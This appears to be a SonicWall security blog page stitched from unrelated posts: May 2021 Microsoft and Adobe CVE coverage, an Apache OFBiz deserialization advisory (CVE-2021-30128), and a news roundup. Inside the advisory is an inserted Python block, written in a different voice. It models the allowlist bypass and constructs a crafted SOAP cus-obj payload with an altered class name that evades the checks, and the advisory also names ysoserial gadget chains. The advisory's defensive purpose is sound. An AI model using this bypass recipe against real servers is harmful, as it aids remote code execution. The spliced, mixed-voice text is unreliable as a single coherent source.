SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of May 2021. A list of issues reported, along with SonicWall coverage information is as follows:

CVE-2021-26419 Scripting Engine Memory Corruption Vulnerability
IPS 15554:Scripting Engine Memory Corruption Vulnerability (CVE-2021-26419)

CVE-2021-31166 HTTP Protocol Stack Remote Code Execution Vulnerability
IPS 15553:Windows HTTP Protocol Stack Remote Code Execution 3

CVE-2021-31170 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 180:Malformed-File exe.MP.180

CVE-2021-31181 Microsoft SharePoint Remote Code Execution Vulnerability
ASPY 181:Malformed-File exe.MP.181

CVE-2021-31188 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 182:Malformed-File exe.MP.182

Adobe Coverage:
CVE-2021-28550 Acrobat Reader Use After Free Vulnerability
ASPY 183:Malformed-File pdf.MP.473

CVE-2021-28560 Acrobat Reader Heap-based Buffer Overflow Vulnerability
ASPY 184:Malformed-File pdf.MP.474

The following vulnerabilities do not have known exploits in the wild:

CVE-2020-24587 Windows Wireless Networking Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-24588 Windows Wireless Networking Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-26144 Windows Wireless Networking Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-26418 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-26421 Skype for Business and Lync Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-26422 Skype for Business and Lync Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27068 Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28455 Microsoft Jet Red Database Engine and Access Connectivity Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28461 Dynamics Finance and Operations Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2021-28465 Web Media Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28474 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28476 Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28478 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-28479 Windows CSC Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-31165 Windows Container Manager Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31167 Windows Container Manager Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31168 Windows Container Manager Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31169 Windows Container Manager Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31171 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-31172 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-31173 Microsoft SharePoint Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-31174 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-31175 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31176 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31177 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31178 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-31179 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31180 Microsoft Office Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31182 Microsoft Bluetooth Driver Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-31184 Microsoft Windows Infrared Data Association (IrDA) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-31185 Windows Desktop Bridge Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-31186 Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-31187 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31190 Windows Container Isolation FS Filter Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31191 Windows Projected File System FS Filter Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-31192 Windows Media Foundation Core Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31193 Windows SSDP Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31194 OLE Automation Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31195 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31198 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31200 Common Utilities Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31204 .NET and Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31205 Windows SMB Client Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-31207 Microsoft Exchange Server Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-31208 Windows Container Manager Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31209 Microsoft Exchange Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-31211 Visual Studio Code Remote Development Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31213 Visual Studio Code Remote Development Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31214 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31936 Microsoft Accessibility Insights for Web Information Disclosure Vulnerability
There are no known exploits in the wild.

Apache OFBiz Vulnerability

Overview:

  Apache OFBiz is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise. Apache OFBiz is a framework that provides a common data model and a set of business processes. Beyond the framework itself, Apache OFBiz offers the following functionality:

  • Accounting (agreements, invoicing, vendor management, general ledger)
  • Asset maintenance
  • Catalogue and product management
  • Facility and warehouse management system (WMS)
  • Manufacturing execution / manufacturing operations management (MES/MOM)
  • Order processing
  • Inventory management
  • Automated stock replenishment etc.
  • Content management system (CMS)
  • Human resources (HR)
  • People and group management
  • Project management
  • Sales force automation
  • Work effort management
  • Electronic point of sale (ePOS)
  • Electronic commerce (eCommerce)
  • Scrum (development)

  An insecure deserialization vulnerability has been reported in Apache OFBiz. This vulnerability is due to Java serialization issues when processing requests. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request.

  Successful exploitation would result in arbitrary code execution.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-30128

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.7 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.7 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Technical Overview:

  An insecure deserialization vulnerability exists in Apache OFBiz. It is due to missing input validation for payloads carried in the "cus-obj" XML element of HTTP requests sent to the "/webtools/control/SOAPService" Request-URI, combined with a bypass of the class allowlist enforced by the Java class "org.apache.ofbiz.base.util.SafeObjectInputStream".

  Requests sent to this endpoint are first handled by the Java class "org.apache.ofbiz.webapp.control.RequestHandler", which determines the mapping for the URL. The invoke() method of "org.apache.ofbiz.webapp.event.SOAPEventHandler" is then called. That method calls deserialize() in "org.apache.ofbiz.service.engine.SoapSerializer", which in turn calls deserialize() in "org.apache.ofbiz.entity.serialize.XmlSerializer".

  The SOAP XML parsing is implemented in the deserializeSingle() method of "org.apache.ofbiz.entity.serialize.XmlSerializer". If the tag name is "cus-obj", the text of that element is stripped of all space and colon ':' characters and hex-decoded by fromHexString() in "org.apache.ofbiz.base.util.StringUtil", and the resulting byte array is passed to getObject() in "org.apache.ofbiz.base.util.UtilObject". That method calls getObjectException() in the same class, where the insecure deserialization occurs.

  Note that getObjectException() uses a custom class, "org.apache.ofbiz.base.util.SafeObjectInputStream", which extends the Java standard library class ObjectInputStream. SafeObjectInputStream enforces an allowlist of classes that may be deserialized; it allows deserialization of any class whose name contains the string "java." anywhere in the name.

  In addition, the overridden resolveClass() method of this class calls the custom loadClass() method in "org.apache.ofbiz.base.util.ObjectType". loadClass() removes from the requested class name everything from the first '<' character onward, so that generic type names can be loaded. Finally, when the JDK standard library class ObjectStreamClass compares the class name in the stream with the class that was actually loaded, it checks only the part of the name after the last '.' character (it does not compare the entire class name before proceeding with deserialization). An attacker can therefore craft a serialized object with a slightly altered class name that passes the allowlist and the JDK's name check while loading a class the allowlist was meant to exclude.

  A remote, unauthenticated attacker could exploit this vulnerability by sending a malicious HTTP request with a crafted XML payload in the request body. Because OFBiz also bundles vulnerable versions of the Apache Commons BeanUtils or ROME libraries, an attacker can build the payload with the ysoserial gadget tool and alter every class name in the serialized object as described above.

  Successful exploitation of this vulnerability could result in arbitrary code execution in the context of the user running the application.
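  To make the chain of checks concrete, the following is an added example in Python (illustrative code, not OFBiz's or the JDK's source). It models the three checks described above as small functions, shows a hypothetical altered class name that passes all three while a strict exact-match allowlist rejects it, and runs the same model over a constructed cus-obj payload after the space/colon stripping that fromHexString() performs. The SOAP body, the serialized-stream prefix, the strict allowlist contents and the class name org.apache.commons.beanutils.BeanComparator<java.BeanComparator are all constructed for the example; BeanComparator stands in for any library class outside the allowlist and no gadget chain is built here.

```python
import re

# --- Model of the three checks the advisory describes (simplified re-implementations,
# --- not OFBiz's or the JDK's actual code) --------------------------------------------

# Assumption: the allowlist matched "java." anywhere in the name (Pattern.find() semantics).
WEAK_ALLOWLIST = re.compile(r"java\.")


def ofbiz_allowlist_ok(stream_name: str) -> bool:
    """SafeObjectInputStream-style check: passes if the name merely contains 'java.'."""
    return WEAK_ALLOWLIST.search(stream_name) is not None


def ofbiz_load_name(stream_name: str) -> str:
    """ObjectType.loadClass()-style handling: everything from the first '<' onward is dropped."""
    cut = stream_name.find("<")
    return stream_name if cut == -1 else stream_name[:cut]


def jdk_class_names_equal(stream_name: str, local_name: str) -> bool:
    """ObjectStreamClass-style name check: only the text after the last '.' is compared."""
    return stream_name.rsplit(".", 1)[-1] == local_name.rsplit(".", 1)[-1]


def vulnerable_resolve(stream_name: str):
    """Class the chain of weak checks would load, or None if the stream name is rejected."""
    if not ofbiz_allowlist_ok(stream_name):
        return None
    local_name = ofbiz_load_name(stream_name)
    if not jdk_class_names_equal(stream_name, local_name):
        return None
    return local_name


# Hardened variant: exact match of the full, unmodified stream name against a closed set
# (contents are an assumption for the example).
STRICT_ALLOWLIST = frozenset({"java.lang.String", "java.util.HashMap", "java.util.ArrayList"})


def hardened_resolve(stream_name: str):
    """Rejects generic suffixes outright and requires an exact allowlist hit."""
    if "<" in stream_name or stream_name not in STRICT_ALLOWLIST:
        return None
    return stream_name


# --- Triage of a cus-obj payload --------------------------------------------------------

JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"   # ObjectOutputStream stream header
TC_CLASSDESC = 0x72                        # class descriptor tag in the serialization grammar


def decode_cus_obj(hex_text: str) -> bytes:
    """fromHexString()-style decoding: spaces and ':' are stripped before hex decoding."""
    return bytes.fromhex(re.sub(r"[\s:]", "", hex_text))


def class_names_in_stream(blob: bytes) -> list:
    """Naive scan for TC_CLASSDESC followed by a length-prefixed UTF class name (triage, not a full parser)."""
    names, i = [], blob.find(TC_CLASSDESC)
    while i != -1:
        length = int.from_bytes(blob[i + 1:i + 3], "big")
        candidate = blob[i + 3:i + 3 + length]
        if 0 < length == len(candidate) and re.fullmatch(rb"[\w.$<>\[\];]+", candidate):
            names.append(candidate.decode())
        i = blob.find(TC_CLASSDESC, i + 1)
    return names


def triage(soap_body: str) -> dict:
    """Report whether a SOAP body carries a Java-serialized cus-obj and which class names it declares."""
    m = re.search(r"<cus-obj>(.*?)</cus-obj>", soap_body, re.S)
    if not m:
        return {"serialized": False, "classes": [], "weak_allows": [], "strict_allows": []}
    blob = decode_cus_obj(m.group(1))
    serialized = blob.startswith(JAVA_SERIAL_MAGIC)
    names = class_names_in_stream(blob) if serialized else []
    return {
        "serialized": serialized,
        "classes": names,
        "weak_allows": [n for n in names if vulnerable_resolve(n)],
        "strict_allows": [n for n in names if hardened_resolve(n)],
    }


def build_sample_stream(class_name: str) -> bytes:
    """Constructed stream prefix: magic, TC_OBJECT, TC_CLASSDESC, UTF name, 8 placeholder bytes."""
    name = class_name.encode()
    return JAVA_SERIAL_MAGIC + bytes([0x73, TC_CLASSDESC]) + len(name).to_bytes(2, "big") + name + b"\x00" * 8


def sample_request(class_name: str) -> str:
    """Constructed SOAP body (not a capture) with the payload hex-encoded and colon-separated."""
    hex_blob = ":".join(f"{b:02x}" for b in build_sample_stream(class_name))
    return f"<soapenv:Envelope><soapenv:Body><cus-obj>{hex_blob}</cus-obj></soapenv:Body></soapenv:Envelope>"


# Hypothetical altered name of the kind the advisory describes: it contains "java.", loses its
# fake generic suffix in loadClass(), and still matches the real class on its simple name.
CRAFTED = "org.apache.commons.beanutils.BeanComparator<java.BeanComparator"
BENIGN = "java.util.HashMap"

if __name__ == "__main__":
    for name in (BENIGN, CRAFTED):
        print(name, "->", triage(sample_request(name)))
```

  The point of the model is the mismatch between the three views of one string: the allowlist sees "java." and says yes, loadClass() sees only the text before '<' and loads a different class, and the JDK name check looks only after the last '.', which the attacker controls. The hardened variant closes all three gaps at once by matching the complete, unmodified name against a closed set; a real deployment would do this with an ObjectInputFilter or by updating to a fixed OFBiz release as the advisory recommends.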

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network connectivity to the vulnerable server.

Triggering Conditions:

  The attacker sends an HTTP request containing a maliciously crafted serialized object within the SOAP data to the affected target. The vulnerability is triggered when the server deserializes the data.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP/HTTPS, over ports 8080/TCP and 8443/TCP

SonicWall's Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 14804 Apache OFBiz Insecure Deserialization 1
  • IPS: 14805 Apache OFBiz Insecure Deserialization 2
  • IPS: 15485 Apache OFBiz Insecure Deserialization 3
  • IPS: 15548 Apache OFBiz Insecure Deserialization 4
  • IPS: 15549 Apache OFBiz Insecure Deserialization 5

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Blocking communication between Apache OFBiz and untrusted networks.
    • Updating to a non-vulnerable version of the product.
    • Filtering attack traffic.

The vendor has released the following advisory regarding this vulnerability:
https://ofbiz.apache.org/security.htm

Cybersecurity News & Trends – 05-07-21

This week’s news was full of attacks on government — including the Alaskan state government, the Belgian federal government and the U.S. Agency for Global Media.


SonicWall in the News

SonicWall Capture ATP aces latest ICSA Lab test, finds more malware — The Evolving Enterprise

  • After 35 days of testing and 1,741 total tests, the multi-engine SonicWall Capture ATP sandbox service with RTDMI received a perfect score in the latest ICSA Labs Advanced Threat Defense test.

Video: 10 Minute IT Jams – SonicWall manager dissects zero trust security — Security Brief Asia

  • SonicWall Head of Presales for APAC Yuvraj Pradhan discusses the importance of zero-trust and its role in the future of cybersecurity.

Industry News

Belgian government, parliament, colleges hit by cyberattack — The Washington Times

  • The company providing internet services for Belgium’s parliament, government agencies, universities and scientific institutions announced that its network was under cyberattack.

CISA used new subpoena power to contact US companies vulnerable to hacking — Cyberscoop

  • The Department of Homeland Security’s cybersecurity agency used a new subpoena power for the first time to contact at least one U.S. internet service provider with customers whose software is vulnerable to hacking.

New Spectre attack once again sends Intel and AMD scrambling for a fix — Ars Technica

  • A new transient execution variant is the first to exploit micro-op caches.

Panda Stealer dropped in Excel files, spreads through Discord to steal user cryptocurrency — ZDNet

  • The malware homes in on cryptocurrency funds as well as VPN credentials.

U.S. Agency for Global Media data breach caused by a phishing attack — Bleeping Computer

  • The U.S. Agency for Global Media (USAGM) has disclosed a data breach that exposed the personal information of current and former employees and their beneficiaries.

Alaska Court System briefly forced offline amid cyber threat — The Washington Times

  • The Alaska court system has temporarily disconnected most of its operations from the internet after a cybersecurity threat on Saturday, including attacks on its website and the removal of the ability to look up court records.

TurgenSec finds 345,000 files from Filipino solicitor-general’s office were breached — ZDNet

  • Sensitive documents from the solicitor-general of the Philippines, including information on ongoing legal cases and passwords, were breached and made publicly available online, a UK security firm has said.

Digital Dollar Project to launch five U.S. central bank digital currency pilots — The Wall Street Journal

  • The U.S. nonprofit Digital Dollar Project said on Monday it will launch five pilot programs over the next 12 months to test the potential uses of a U.S. central bank digital currency, the first effort of its kind in the United States.

NSA Issues Guidance on Securing IT-OT Connectivity — Security Week

  • The NSA’s advisory, “Stop Malicious Cyber Activity Against Connected Operational Technology,” addresses the Department of Defense, national security system and defense industrial base organizations — but the recommendations can be useful to any industrial company.

Pulse Secure fixes VPN zero-day used to hack high-value targets — Bleeping Computer

  • Pulse Secure has fixed a zero-day vulnerability in the Pulse Connect Secure (PCS) SSL VPN appliance that is being actively exploited to compromise the internal networks of defense firms and government agencies.

New Buer Malware Downloader Rewritten in E-Z Rust Language — Threat Post

  • It’s coming in emails disguised as DHL Support shipping notices and is apparently getting prepped for leasing on the underground.

Codecov starts notifying customers affected by supply-chain attack — Cyberscoop

  • Codecov has started notifying the maintainers of software repositories, via both email and the Codecov application interface, that the company believes the affected repositories were downloaded by threat actors.

US prosecutors fine German software company for violating sanctions against Iran — The Hill

  • Software giant SAP SE agreed to pay over $8 million as part of the resolution with the Department of Justice, Commerce Department and Treasury Department, authorities said.

Researchers find two dozen bugs in software used in medical and industrial devices — Cyberscoop

  • Microsoft researchers have discovered some two dozen vulnerabilities in software embedded in popular medical and industrial devices that an attacker could use to breach those devices, and in some cases cause them to crash.

In Case You Missed It